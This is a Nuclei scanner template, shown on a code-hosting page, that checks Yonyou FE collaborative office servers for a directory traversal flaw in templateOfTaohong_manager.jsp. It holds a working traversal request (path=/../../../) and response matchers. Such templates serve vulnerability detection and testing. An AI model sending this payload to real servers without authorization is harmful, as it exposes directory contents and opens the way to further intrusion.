nuclei-templates/http/vulnerabilities/yonyou/yonyou-fe-directory-travers...

34 lines
1.2 KiB
YAML
Executable File
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: yonyou-fe-directory-traversal
info:
name: yonyou-fe-directory-traversal
author: SleepingBag945
severity: medium
description: 用友 FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞通过漏洞攻击者可以获取目录文件等信息导致进一步攻击
reference:
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html
tags: yonyou
http:
- raw:
- |
GET /system/mediafile/templateOfTaohong_manager.jsp?path=/../../../ HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Cookie: JSESSIONID=31DB4A83640B082DBA62A54ADB04D77C
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: word
words:
- "window.location=\"templateOfTaohong_manager.jsp?path=\""
- type: word
words:
- "var next=window.confirm(\"确定删除文件吗?\");"
- type: status
status:
- 200